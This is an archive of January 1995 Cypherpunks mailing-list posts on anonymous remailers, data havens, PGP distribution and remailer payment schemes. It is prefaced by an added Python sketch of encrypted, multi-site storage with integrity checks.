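The arrangement argued over in this thread (the depositor encrypts first, trusts the operator only to hold bytes, and spreads copies over several places) can be sketched as follows. This is an added example, not code from any poster or from an existing data haven; the `Haven` class, the function names, the key and the placeholder ciphertext are all constructed for illustration, and the encryption itself is assumed to have been done beforehand (for instance with PGP).

```python
import hashlib
import hmac


class Haven:
    """Constructed stand-in for a remote operator: stores opaque bytes under a handle."""

    def __init__(self, name):
        self.name = name
        self.blobs = {}

    def put(self, handle, blob):
        self.blobs[handle] = bytes(blob)

    def get(self, handle):
        return self.blobs.get(handle)  # None models an operator that lost the data


def _subkey(master_key, purpose):
    # Separate keys for naming and for authentication, both derived from one secret.
    return hmac.new(master_key, purpose, hashlib.sha256).digest()


def handle_for(master_key, label):
    """Handle the depositor can recompute from a private label; the haven never sees the label."""
    return hmac.new(_subkey(master_key, b"handle"), label.encode(), hashlib.sha256).hexdigest()


def _tag(master_key, handle, ciphertext):
    # Binding the handle into the tag stops an operator from answering a request
    # for one deposit with a different, individually valid, deposit.
    msg = handle.encode() + b"\x00" + ciphertext
    return hmac.new(_subkey(master_key, b"mac"), msg, hashlib.sha256).digest()


def deposit(master_key, label, ciphertext, havens):
    """Store tag || ciphertext at every haven and return the handle used."""
    handle = handle_for(master_key, label)
    blob = _tag(master_key, handle, ciphertext) + ciphertext
    for haven in havens:
        haven.put(handle, blob)
    return handle


def retrieve(master_key, label, havens):
    """Return (ciphertext, report); report maps haven name to ok / missing / altered."""
    handle = handle_for(master_key, label)
    report, good = {}, None
    for haven in havens:
        blob = haven.get(handle)
        if blob is None:
            report[haven.name] = "missing"
            continue
        tag, body = blob[:32], blob[32:]
        if len(blob) >= 32 and hmac.compare_digest(tag, _tag(master_key, handle, body)):
            report[haven.name] = "ok"
            if good is None:
                good = body
        else:
            report[haven.name] = "altered"
    if good is None:
        raise LookupError("no haven returned an intact copy")
    return good, report


def demo():
    key = bytes(range(32))  # constructed key, for the demo only
    ciphertext = b"-----BEGIN PGP MESSAGE----- (constructed placeholder bytes)"
    havens = [Haven("a"), Haven("b"), Haven("c")]
    handle = deposit(key, "test results", ciphertext, havens)
    del havens[0].blobs[handle]  # operator "a" loses the file
    blob = havens[1].blobs[handle]
    havens[1].blobs[handle] = blob[:-1] + bytes([blob[-1] ^ 1])  # "b" alters one byte
    return retrieve(key, "test results", havens)


if __name__ == "__main__":
    print(demo())
```

The depositor keeps only the master key and the private label; a haven that loses or alters its copy is reported, and retrieval succeeds as long as one copy verifies.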
From skaplin at mirage.skypoint.com Fri Jan 13 00:04:29 1995
From: skaplin at mirage.skypoint.com (Samuel Kaplin)
Date: Fri, 13 Jan 95 00:04:29 PST
Subject: Remailer@jpunix.com down!!!???
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

I just read that the remailer at jpunix.com went down suddenly and
permanently. Anyone know what happened?? I also believe the whole site is
down as it didn't answer my pings a couple of days ago.

Sam

- --
==============================================================================
skaplin at skypoint.com                  | Finger skaplin at infinity.c2.org for
                                        | a listing of crypto related files
PGP encrypted mail is accepted and      | available on my auto-responder.
preferred.                              | (Yes...the faqs are there!)
                                        |
E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard
Finger skaplin at mirage.skypoint.com   | outside a Roman brothel.
==============================================================================

A man without a God is like a fish without a bicycle.

From root at nesta.pr.mcs.net Fri Jan 13 00:13:56 1995
From: root at nesta.pr.mcs.net (Nesta Stubbs)
Date: Fri, 13 Jan 95 00:13:56 PST
Subject: Data Havens..A consumer perspective
In-Reply-To:
Message-ID:

On Thu, 12 Jan 1995, Jonathan Rochkind wrote:

> At 4:30 AM 01/12/95, Nesta Stubbs wrote:
> You shouldn't ever give the operator the info in plaintext. Encrypt it,
> public or otherwise, and distribute the key to your Band of Merry Men.
> Then it doesn't matter even it's sitting on a public access Unix system, no
> one can read it anyhow. The main point of this kind of data haven seems to
> be providing you a remote location to store your data, in an anonymous way,
> so even if it does end up being found out, you can't be linked to it. I
> wouldn't trust the operator to do anything particular with the data other
> than keep it safe enough so I can retrieve it later, and I'd take the
> necessary precautions to account for that lack of trust. The only reason
> I'd trust him to even keep it safe for me, is because of reputation market.
> If he routinely loses people's data, word is going to get around. On the
> other hand, if he routinely shows people's data to the FBI, no one is even
> going to know about it. I don't trust him not to routinely show the data to
> the FBI, or store it in public. Use encryption.
>
first note that in carol ann's post she previously said it doesn't
matter to her how the data is transported, and thus it could be in
plaintext, I made. and also that she said that the operator should be
able to specify how it was transmitted.

once again we're running with different definitions of data haven. I see
the data haven as more than just a place to safely store data if it's
encrypted, I see it capable of a lot of other things, like acting as a
central point to BlackNet type operation, with the proper structure set
up to carry out the transactions with safety, or relative safety. also,
as a anonymous drop box type of place, I can then send my encrypted data
to the data haven, and let them hold it until some anonymous client or
employer and I complete an agreed upon contract and both give word to
the data haven to complete its part of the contract, whether it is
allowing the other person to now access that encrypted information, or
doing a monetary transaction with net-cash or whatever. Also, as a data
base of illegal information, like old credit records and such.
> Of course there are different purposes for data havens, which would require
> more trust of the operator. But I'm not sure how well those are ever going
> to work, because I'd much rather trust my encryption than trust the
> operator.
>
agreed. there are also other operations besides data storage that can be
protected by your own crypto, and only use the data haven as a mid-point.

argh, I'm sorry for the poor typing in this letter, and the other one I
sent to Eric on this subject, it's really late and I am dogged, just got
done 9 hours of work. But this topic is so interesting for me I couldn't
resist. Tomorrow if I get a chance I will attempt to outline what *I*
think of when I am saying data haven, maybe it will help us be more
productive, not that we aren't doing that now...

From jsled at eis.calstate.edu Fri Jan 13 00:25:06 1995
From: jsled at eis.calstate.edu (Joshua M. Sled)
Date: Fri, 13 Jan 95 00:25:06 PST
Subject: Remailer@jpunix.com down!!!???
In-Reply-To:
Message-ID:

On Fri, 13 Jan 1995, Samuel Kaplin wrote:

> I just read that the remailer at jpunix.com went down suddenly and
> permanently. Anyone know what happened?? I also believe the whole site is
> down as it didn't answer my pings a couple of days ago.

He was getting spam from AOL at the rate of 25 messages every 5
seconds... so he took the system down.

Joshua M. Sled

From lcottrell at popmail.ucsd.edu Fri Jan 13 00:53:06 1995
From: lcottrell at popmail.ucsd.edu (Lance Cottrell)
Date: Fri, 13 Jan 95 00:53:06 PST
Subject: for-pay remailers and FV
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Pierre Uszynski writes:
>Doug Barnes said:
>Same here, but from the other tack: "Remailer Guild??? Give me a
>break :-)" My problem with the idea of "Guild" (or any quasi
>general agreement) of remailer operators is that:
>
>On the one side:
>- The whole idea of using a remailer chain comes from distrust of
>the operators. The operators should be the ones to distrust each other
>the most.

I agree.
There should be minimal cooperation between remailer operators. They
should work together on standards and policies to ensure the free flow
of messages. They should not be afforded an opportunity to conspire.

>Pierre.
>pierre at shell.portal.com

Observation: Most complaints to remailers come from news posts. Only a
small fraction from direct mail. (Is this the experience of the other
operators?)

Suggestion: Pay the first and last remailers in the chain. The first
remailer knows who you are. You simply purchase an account from him. He
provides support and user friendly utilities... Block all posts from
normal remailers. News posts only allowed from pseudonym servers like
omega.c2.org. The user uses e-cash, or greenbacks in an envelope, to buy
an account on the nym server. All email from other remailers, and to any
address is free.

Thoughts?

--------------------------------------------------
Lance Cottrell who does not speak for CASS/UCSD
loki at nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra. Suddenly
it flips over, pinning you underneath. At night the ice
weasels come."
        --Nietzsche

From lcottrell at popmail.ucsd.edu Fri Jan 13 00:53:11 1995
From: lcottrell at popmail.ucsd.edu (Lance Cottrell)
Date: Fri, 13 Jan 95 00:53:11 PST
Subject: Remailer postage
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

>jpb at gate.net wrote:
>> Where can I get the Magic Money software?
>
>I'm a bit behind, so sorry if others have already suggested this, but
>you should need any digicash for this... stamps can be just big random
>numbers. Someone buys a book of stamps, you make 10 big random
>numbers send them a copy and keep a copy on file. After a message
>comes through with a particular number you throw that number out.
>
>Just like real stamps, and unlike money, they can be used only once.

However I now can recognize which messages are yours. If I work with
another operator, I can eliminate all the remailers between us for
purposes of traffic analysis.

--------------------------------------------------
Lance Cottrell who does not speak for CASS/UCSD
loki at nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra. Suddenly
it flips over, pinning you underneath. At night the ice
weasels come."
        --Nietzsche

From lcottrell at popmail.ucsd.edu Fri Jan 13 00:54:17 1995
From: lcottrell at popmail.ucsd.edu (Lance Cottrell)
Date: Fri, 13 Jan 95 00:54:17 PST
Subject: Remailer source
Message-ID:

>Octavian Ureche wrote:
>
>> Does anybody know where could I find UNIX sources
>> for a remailer ?
>

Try mixmaster. I can not post the path for export reasons. Mail me if
you want it. It runs on Sparc. Does not run on Linux and FreeBSD. All
others unknown.

--------------------------------------------------
Lance Cottrell who does not speak for CASS/UCSD
loki at nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/ Home of "chain" the remailer chaining script. For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche From HALVORK at sofus.hiof.no Fri Jan 13 01:46:23 1995 From: HALVORK at sofus.hiof.no (Halvor Kise jr.) Date: Fri, 13 Jan 95 01:46:23 PST Subject: Some PGP problems Message-ID: <14DAA230C3F@sofus.hiof.no> Hello! I have send an reply to C. Crunch. I enclosed the "Where to get the latest PGP"-FAQ - Halvor. >Hi, > >I'm trying to decode a PGP file that was created with Ver 2.6. >At this time, I thought that my older ver 2.1c (Running on a >Mac) would at least be able to decrypt something made from >a higher version, running on a PC. Apparently that is not so. > >So, the next thing I did, or what any self respecting >Cypherpunk might so, is to go out on the net and look >for a later version to FTP> Well, after discovering >that soda.berkeley.edu don't exist anymore, I eventually >found the ftp site where it lives. ftp.csua.berkeley.edu. > >I learn that Mac PGP2.3 exists, but NO version 2.6 >exists for the Mac. Is that true? If not, then >where can I get a copy, so I can decode a message >created with 2.6? If ver 2.3 will decode a message >encoded with 2.6, then I'm faced with how I can >extract this Mac file which has a .gz extension. >Binhex don't seem to decode it. So, I now got this >file named "macpgp2.3.cpt.hqx.gz" on my Mac. Was >I supposed to have used some special UNIX itility to >convert the .gz thingie first? Please emlighten >this confused cypherpunker!!! :-) Or will I even have >to do all of this because 2.3 is incompatable with 2.6. > >C. Crunch -- * MEMENTO MORI * _____________________________________________________ | Halvor Kise jr. 
* Halvor.Kise.jr at hiof.no | | * halvork at sofus.hiof.no | | Ostfold * halvork at frodo.hiof.no | | Regional College * Student at | | N-1757 Halden * Computer Science | | * | | | | Finger halvork at sofus for PGP-key | ----------------------------------------------------- From jrt at asiaonline.net Fri Jan 13 03:06:37 1995 From: jrt at asiaonline.net (jRT) Date: Fri, 13 Jan 95 03:06:37 PST Subject: Reefer madness In-Reply-To: <9501122229.AA13951@netmail2.microsoft.com> Message-ID: On Thu, 12 Jan 1995, Blanc Weber wrote: > From: Sandy Sandfort > > Ever seen a Turkish prison film, Reuben? > ......................................................... > > I don't get it. (I haven't seen one) > > Blanc > "Have you ever seen a grown man naked?", I think that's how they put it in Airplane - Flying High, the movie from the early 80s I think, before going on with the Turkish prison bit. Basically there is a lot of sex between the men in jails there, and mostly unwanted but forced. Regds PS if you get really stuck, you could ask your folks. From Andreas.Elbert at gmd.de Fri Jan 13 03:11:57 1995 From: Andreas.Elbert at gmd.de (Andreas Elbert) Date: Fri, 13 Jan 95 03:11:57 PST Subject: "safe" Internet access Message-ID: sorry to correct you, but the 900 MHz licensefree radios, the cellular radios (analog and digital) and Modacom and Mobitex are all different animals. i don't want to go into details though, because it doesn't change your main point, the ability to localize one of these radios while transmitting. Andreas From hroller at metronet.com Fri Jan 13 05:23:39 1995 From: hroller at metronet.com (Michael L. Acklin) Date: Fri, 13 Jan 95 05:23:39 PST Subject: PGP and Windows Message-ID: Mark, I saw your message on Cypherpunks List and noticed that you were using WinEudora. My question is do you know of a program that will do encryption with PGP on the fly within Windows. I know how to encrypt a file and attach it to a message. And I have both WinPGP 2.6 and WinPGP 1.0. 
Both only encrypt files. Any help would greatly be appreciated. Thanks in Advance.... Mike Acklin ---------------> hroller at metronet.com Pub Key available at MIT Key Server. From joelm at eskimo.com Fri Jan 13 06:12:09 1995 From: joelm at eskimo.com (Joel McNamara) Date: Fri, 13 Jan 95 06:12:09 PST Subject: Windows Eudora PGP/remailer add-on Message-ID: <199501131412.AA12078@mail.eskimo.com> I'm working on a pre-mailer/PGP shell that works with Eudora for Windows. You compose the mail in the shell, encrypt it, specify remailer(s), and it transfers the message back to Eudora. It's called Private Idaho. Anonymous FTP from ftp.eskimo.com /joelm/pidaho11.zip. There were some problems with the loading routine in version 1.0, but hopefully I've fixed them in this version. Any comments, requests, bug reports appreciated. Joel McNamara joelm at eskimo.com - finger for PGP key From an158409 at anon.penet.fi Fri Jan 13 06:12:50 1995 From: an158409 at anon.penet.fi (beacher) Date: Fri, 13 Jan 95 06:12:50 PST Subject: telecommunications reform again Message-ID: <9501131259.AA05870@anon.penet.fi> Telecom Legislative Effort Opens WASHINGTON, D.C., U.S.A., 1995 JAN 12 (NB) -- The Herculean task rewriting the nation's telecommunications law, an effort that failed in the 103rd Congress, has begun in Washington. The Senate Commerce Committee opened the action this week with a hearing on general concepts of communications reform. The last time Congress successfully addressed the communications needs of the nation was 50 years ago, with the 1934 Communications Act. The new Republican Congress is expected to support deregulation and competition in the provision of telecommunications services. But so do most Democrats, and the devil will be in the legislative details, as the various forces in the marketplace seek to use legislative language to secure competitive advantages. Sen. Larry Pressler (R-SD), chairman of the committee, predicted that his panel will report a bill by July 4. 
Rep. Jack Fields (R-Texas), who heads the House telecommunications subcommittee, said his group will approve a bill by Easter. But neither legislator has yet to introduce a bill, so experts are unable to predict where the inevitable fights will occur and on whose turf. "Let's pick a starting date -- January 1, 1996 or 1997 -- and say, 'Gentleman, start your engines. We're going to have a race and let the best man win,'" said Sen. Bob Packwood (R-Ore.) at the hearing. As the opening bell was ringing in the Senate, Vice President Al Gore was trying to gin up support for the administration's views on telecommunications at a meeting of state regulators and local government officials. "Competition in the information marketplace will provide Americans with lower prices for their telephones, cable and information goods and services and give them more and better choices," Gore said. The White House estimates that competition in telecommunications will also create 1.4 million new jobs over the next 10 years. The contending forces were also getting organized. The seven regional Bell operating companies announced that Gary McBee, former chairman of the United States Telephone Association, will head their lobbying efforts in the new Congress. The Baby Bells support opening all markets to immediate competition. "It's time to open all markets to all competitors, under the same conditions and at the same time," McBee said. "That will mean lower prices, more choices and better service for everyone." McBee's coalition will be called the Alliance for Competitive Communications. (Kennedy Maize/19950111/Press Contact: Bill McCloskey, ACA, 202-463-4129) ------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. Due to the double-blind, any mail replies to this message will be anonymized, and an anonymous id will be allocated automatically. You have been warned. 
Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From perry at jpunix.com Fri Jan 13 07:06:19 1995 From: perry at jpunix.com (John A. Perry) Date: Fri, 13 Jan 95 07:06:19 PST Subject: Remailer@jpunix.com down!!!??? In-Reply-To: Message-ID: <199501131505.JAA05109@jpunix.com> A non-text attachment was scrubbed... Name: not available Type: text/x-pgp Size: 1205 bytes Desc: not available URL: From asgaard at sos.sll.se Fri Jan 13 07:36:05 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Fri, 13 Jan 95 07:36:05 PST Subject: Cellular and Crime Message-ID: There is this criminal trial going on in Stockholm concerning a group of suspects that entered a bank vault through the roof over a weekend in 1992. They have been prime suspects for a long time but evidently it has taken a lot of time to build up a case against them. Traffic analysis (but not tapping of the actual conversations, GSM? - no mention of the system in the news stories) plays a substantial role in the prosecution. 'A and B were at X at the same time','B and C were in the vicinity of the Bank at this time' etc. The suspects have not tried to argue that their cellulars were on loan to some stray persons. We all know that a booted cellular is a wonderful Area Locator. (I wonder if the suspects knew?) But I have (naively) been thinking that the authorities needed prior suspicion using this feature in 'real time'. Judging from what has been written about this trial the police must have requested, and received, logged traffic data quite some time afterwards. Perhaps they log it for ever?
Mats From tedwards at src.umd.edu Fri Jan 13 09:17:11 1995 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Fri, 13 Jan 95 09:17:11 PST Subject: "safe" Internet access In-Reply-To: Message-ID: On Fri, 13 Jan 1995, Andreas Elbert wrote: > sorry to correct you, but the 900 MHz licensefree radios, the cellular > radios (analog and digital) and Modacom and Mobitex are all different > animals. > i don't want to go into details though, because it doesn't change your main > point, the ability to localize one of these radios while transmitting. However, if there are a large number of 900 MHz radio modems operating in a cryptographically secure spread-spectrum method, it may be very difficult to locate your particular transmitter...however the modem you are talking to will know your pseudonoise sequence, and a receiver that knows this will have a much easier time tracking you down. -Thomas From hayden at krypton.mankato.msus.edu Fri Jan 13 09:31:26 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Fri, 13 Jan 95 09:31:26 PST Subject: Dangerous Web Site Message-ID: I was net-surfing and I came across the following site: http://www.satelnet.org/ They do credit checks of any person, SS# ID's, national database searches, etc of any person or business (for a small fee). Gee, don't I feel like little brother now. ____ Robert A. Hayden <=> hayden at krypton.mankato.msus.edu \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> I am Pentium of Borg \/ Finger for PGP Public Key <=> you will be approximated From eric at remailer.net Fri Jan 13 09:48:25 1995 From: eric at remailer.net (Eric Hughes) Date: Fri, 13 Jan 95 09:48:25 PST Subject: How do I know if its encrypted? In-Reply-To: <199501122233.OAA02325@ix3.ix.netcom.com> Message-ID: <199501131746.JAA02913@largo.remailer.net> From: daleh at ix.netcom.com (Dale Harrison (AEGIS)) Paco begins by inventing the new [format] of which only Paco knows the internals. Fine. 
The operator has no idea of how to make sense of this data format. Just because someone in the world has an interpretation for it doesn't mean that I do. No operator of any data service can be expected to know about every data interpretation. The key here is "good faith". An operator can undertake a good faith effort to remain ignorant about content. The argument that "it passed the filter, so it's approved" is bogus. The counter is that "it passed the filter, so I personally have no idea what's inside it." Knowledge here is personal specific knowledge, not an acknowledgement of a possibility. Eric From eric at remailer.net Fri Jan 13 09:51:59 1995 From: eric at remailer.net (Eric Hughes) Date: Fri, 13 Jan 95 09:51:59 PST Subject: Microsoft TrueName (tm) (fwd) In-Reply-To: Message-ID: <199501131750.JAA02922@largo.remailer.net> From: rah at shipwright.com (Robert Hettinga) Eric, what'll you take for "remailer.net"? ;-). Addresses under remailer.net will be available to operators of approved remailers. Approved is yet to be defined, so no one could possibly satisfy the conditions for it yet. In the meanwhile, I'm using as a vanity license plate. Eric From eric at remailer.net Fri Jan 13 09:54:19 1995 From: eric at remailer.net (Eric Hughes) Date: Fri, 13 Jan 95 09:54:19 PST Subject: How do I know if its encrypted? In-Reply-To: Message-ID: <199501131752.JAA02925@largo.remailer.net> From: Ben.Goren at asu.edu Here's a solution: What problem, pray tell, does this solve? It seems far more complicated than it need be. Alice sends a file to Dave's DataHaven. When Alice wants her file back, she sends to Dave a secure hash of the file, a key with which to decrypt it, and a handful of plaintext at the beginning of the file. Dave decrypts the file that matches the hash with the key Alice gave him; if the file begins as Alice says it should, Dave returns the file to Alice. 
Eric From eric at remailer.net Fri Jan 13 10:02:18 1995 From: eric at remailer.net (Eric Hughes) Date: Fri, 13 Jan 95 10:02:18 PST Subject: How do I know if its encrypted? In-Reply-To: <9501130137.AA03281@eri.erinet.com> Message-ID: <199501131800.KAA02934@largo.remailer.net> At 10:08 PM 1/11/95 -0800, Eric Hughes wrote: > ... Seems to me that a quite reasonable condition of use of a remailer is >that what is passed isn't human readable. From: pstemari at erinet.com (Paul J. Ste. Marie) Perhaps I missed this, but why? If someone is going to plant kiddie porn or whatever on you, does it really matter if they encrypt it first or not? If you can't read it, it's not kiddie-porn *for you*, although it might be for someone with the key. Encryption fragments meaning subjectively. A magazine, for example, has a fixed center of meaning for all who can read the language. A magazine looks the same to all who look at it. An encrypted file looks different to those who have the key from those who do not. Encrypted data is fundamentally different from paper-and-ink data in this way. The metaphor of "planting it on somebody" does not apply to data that the "somebody" can't read. I forget the name of the cypher (Vigere, perhaps--the one that uses a series of Caesar-like cyphers keyed by a password), but you could just run it through that with a password of abcdefghijklmnopqrstuvwxyz and you'd flatten out the distribution enough to get it by casual inspection. Fine. I think that would suffice. If you can't easily read it, you can't be expected to have read it. The operator of a data service has _zero_ motivation to cryptanalyze something. If they happen to apply a viewer to the file (for whatever reason), they don't _want_ to see what's inside.
Eric From eric at remailer.net Fri Jan 13 10:09:41 1995 From: eric at remailer.net (Eric Hughes) Date: Fri, 13 Jan 95 10:09:41 PST Subject: essential characteristics of a Data Haven In-Reply-To: Message-ID: <199501131807.KAA02940@largo.remailer.net> From: Adam Feuer what differentiates a "data haven" from "reasonably secure offsite storage"? Right now, that's easy. Data havens don't exist, and prototype code for reasonably secure off-site storage does. The key distinguishing feature of off-site storage is that it stores data only as bits, structured and segmented, but not interpreted _as_ anything but bits. A data haven, on the other hand, holds things that someone disapproves of, otherwise there's no need for a haven. _A fortiori_, if someone disapproves of it, it must mean something. Raw bits don't mean anything, or rather, they can mean everything. Eric From eric at remailer.net Fri Jan 13 10:14:13 1995 From: eric at remailer.net (Eric Hughes) Date: Fri, 13 Jan 95 10:14:13 PST Subject: Anonymous payment scheme In-Reply-To: <199501130333.QAA03633@akeake.its.vuw.ac.nz> Message-ID: <199501131811.KAA02946@largo.remailer.net> From: Paul Foley NZ Telecom are conducting an experiment with using phonecards in softdrink vending machines. There was an article in The Dominion newspaper's _InfoTech_ magazine crying out for the Government to stop it, claiming Telecom's creating an independent (from the Reserve Bank) currency, will destroy the New Zealand economy, etc., etc. Sounds like your basic central banking ignorance. Look folks, just so y'all don't look like idiots, remember this: A means of payment is not the same thing as a currency. Eric From ddt at lsd.com Fri Jan 13 10:24:16 1995 From: ddt at lsd.com (Dave Del Torto) Date: Fri, 13 Jan 95 10:24:16 PST Subject: Pgp where? Message-ID: At 6:52 am 1/12/95, kevin.rock at njackn.com wrote: >I think this is the correct board to put this message on, but since there are >no messages to read here I might be wrong.
Does anyone know where to locate >the program (algorithm) Pretty Good Protection (PGP) ? I've read about it in >the local newspaper, in Scientific American and in the alternate news message >area. It sounds like a good encryption scheme and I would like to explore >its possibilities. Thanks for any assistance. Kevin, FYI, I keep the most recent version of Mike Johnson's excellent guide on where to find PGP in: ftp.netcom.com:/pub/dd/ddt/crypto/crypto_info/where_is_pgp?.txt This is a plain text file, but (for Mac users) the file: ftp.netcom.com:/pub/dd/ddt/crypto/crypto_info/where_is_pgp?.txt.sea.bin is a self-expanding Mac archive (faster transfer time). There're some other informational files in that dir, and any cpunks who know of a quintessential PGP info file are encouraged to let me know so I can post it there. Remember, this "archive" is oriented toward new PGP users who need friendly information on why/how/who/where/when etc. If you're in the US or Canada, you can also find the most up-to-date version of the MacPGP application in this directory: ftp.netcom.com:/pub/dd/ddt/crypto/NOT_FOR_EXPORT Be sure to read the ReadMe files detailing the export restrictions, since transfer of this software to a system or machine outside of the US or Canada is strictly verboten. Send email to if you have further questions. dave ______________________________________________ "Civil Liberty Through Simple Cryptography." From chen at intuit.com Fri Jan 13 11:00:30 1995 From: chen at intuit.com (Mark Chen) Date: Fri, 13 Jan 95 11:00:30 PST Subject: FBI and BLACKNET In-Reply-To: Message-ID: <9501131859.AA09568@doom> If anyone is interested, I have a complete "FOIA Kit," issued by the Fund for Open Information and Accountability, Inc. It includes instructions, advice, and an assortment of sample letters. E-mail me if you would like a copy.
-- Mark Chen chen at intuit.com 415/329-6913 finger for PGP public key D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From eric at remailer.net Fri Jan 13 11:14:22 1995 From: eric at remailer.net (Eric Hughes) Date: Fri, 13 Jan 95 11:14:22 PST Subject: How do I know if its encrypted? In-Reply-To: Message-ID: <199501131912.LAA02985@largo.remailer.net> From: lce at wwa.com (Larry E) The goal is to convince the two groups of concerned parties[, in short, users & lawyers,] that the remailer operators don't know the contents of what's passing through their remailers: This is exactly right. With a sealed box which you can't look in at all, this is easy. Providing an assurance on a general purpose computer is more difficult. And yes, it _is_ always possible to simulate a filter that's not a filter, blah, blah, blah. We are in the realm of social interactions here, not in the realm of technology. The remailers are operated by people who want to promote information flow, not restrict it. They provide an important service that is of critical importance to some people and groups who use the net. They shouldn't be held accountable for the few who abuse the remailers, and encryption helps prevent that from happening. I agree with this argument. It is the germ of discourse about the public policy of remailers and anonymity generally. I want to point out the rhetorical content of this statement, though, more than my agreement with it. The cypherpunks list is filled with paranoid nay-sayers who can't distinguish their own paranoia from a legitimate technological failing. I feel a dire need for a positive rhetoric of cryptography. I want to be 'for' something and to know what it's good for rather than to be against everything that doesn't meet my personal desires. How many times have I seen a particular solution whose response is "But I want more, and this won't work for that"!
The most self-deceptive say "It can't be done", the slightly more honest say "You can't do it", and none say "I will not do it". So now all you people who think that remailers don't work, don't run one. Good, I see most of you are already complying with this directive. Even the simplest remailer has utility. If there were no utility, then nobody would use them (duh). It is not only foolishness and idiocy but also mendaciousness to say that "remailers just don't work". It is constructive to say, however, that "the current remailers don't work against the following opponent", but this is not usually the case. Rather, the speaker's paranoia silently projects their own requirements onto a technical discussion, leaving only confusion. Look at the recent conversation over postage for remailers. Paraphrasing: "Credit cards won't work because they're not anonymous". My response: "Bullshit". Using a credit card as a means of payment does put constraints on usage, but it doesn't prevent usage (duh redux). What credit card payment does do is to require more effort in order to link email transactions. This is an unalloyed good, but pure silver instead of gold. There are better ways, one of them First Virtual, which at the least has counterparty anonymity; another, blind sigs (as yet unusable for payments). The implicit assumption here is that "If I can't use it to smash the state, it's worthless". Well, thank you very much for constraining my ability for privacy with your political agenda. And I have a hint for all the state-smashing wannabe-businesspeople out there: the ones who have a business (less secure) now will eat your lunch for the business (more secure) later. To be dry and academic about this, I'd say that the problem was an insufficiency in threat modelling. But that just doesn't quite mean the same thing, n'est ce pas? 
Eric From eric at remailer.net Fri Jan 13 11:17:44 1995 From: eric at remailer.net (Eric Hughes) Date: Fri, 13 Jan 95 11:17:44 PST Subject: time stamping service (again) In-Reply-To: Message-ID: <199501131916.LAA02991@largo.remailer.net> From: sdw at lig.net (Stephen D. Williams) It should have minimize bandwidth, minimize cpu, minimize storage levels of service to allow different levels of users to have different possible impact on the machine. (Ie. : local, paying, regional, unknown, domain, etc.) This is the area of policy, for which there are no general purpose solutions that I know of. I see a need for a general purpose module that would accept authorization requests from various end-user services (remailing, timestamping, storage, etc.) and return yes or no. If money is part of the policy, this is the place to implement it. That said, I don't think the lack of a policy engine prevents a cypherware distribution from happening. Eric From eric at remailer.net Fri Jan 13 11:21:15 1995 From: eric at remailer.net (Eric Hughes) Date: Fri, 13 Jan 95 11:21:15 PST Subject: Data Havens..A consumer perspective In-Reply-To: Message-ID: <199501131919.LAA02994@largo.remailer.net> From: Nesta Stubbs are you saying that there is an agreement between the data haven operator and the user? There's always an agreement, implicit or explicit. Right now we are getting into so many fraggin different definitions of data haven, that this conversation is looping over itself infinitely. Well, the 'data haven' that started the topic of discussion was a misnomer; it's really an off-site storage facility. I don't know about the rest of the list, but I'm more concerned with discussing working code. Eric From hayden at krypton.mankato.msus.edu Fri Jan 13 11:24:37 1995 From: hayden at krypton.mankato.msus.edu (Robert A.
Hayden) Date: Fri, 13 Jan 95 11:24:37 PST Subject: Amusing thing that might interest Message-ID: I thought that this might amuse: -------------------- Newsgroups: rec.humor.funny From: scotta at kije.gsfc.nasa.gov (Scott Austin) Subject: Information Superhighway: The Real Scoop As seen in "Abort, Retry, Fail?", by Don Willmont, from the July '94 PC Magazine. ------------------------- Renaming the Info Highway ------------------------- We asked you to help us rename the Information Highway, and boy, did you ever! [runner-up info deleted] The winner is Kevin Kwaku, who suggested that while the Information Superhighway is a bad name, it could be a great acronym, standing for "Interactive Network For Organizing, Retrieving, Manipulating, Accessing, And Transferring Information On National Systems, Unleashing Practically Every Rebellious Human Intelligence, Gratifying Hackers, Wiseacres, And Yahoos." Scott Austin scott_austin at cnt.com -- Selected by Maddi Hausmann Sojourner. MAIL your joke to funny at clarinet.com. Attribute the joke's source if at all possible. A Daemon will auto-reply. Remember: Always give your jokes a descriptive "Subject:" line. Don't use "joke" or "submission" or "joke submission," please. From Ben.Goren at asu.edu Fri Jan 13 11:27:56 1995 From: Ben.Goren at asu.edu (Ben.Goren at asu.edu) Date: Fri, 13 Jan 95 11:27:56 PST Subject: How do I know if its encrypted? Message-ID: At 10:52 AM 1/13/95, Eric Hughes wrote: > From: Ben.Goren at asu.edu > > Here's a solution: > >What problem, pray tell, does this solve? That of the data haven operator being able to deny knowledge of the contents of files people send him. He'll only return files that, when operated on by a strong cryptographic algorithm, make sense. He therefore can't look inside the files until the owner asks for them back. If he operates a timely (and automated) service, he can't know the contents until after he's already sent the file back.
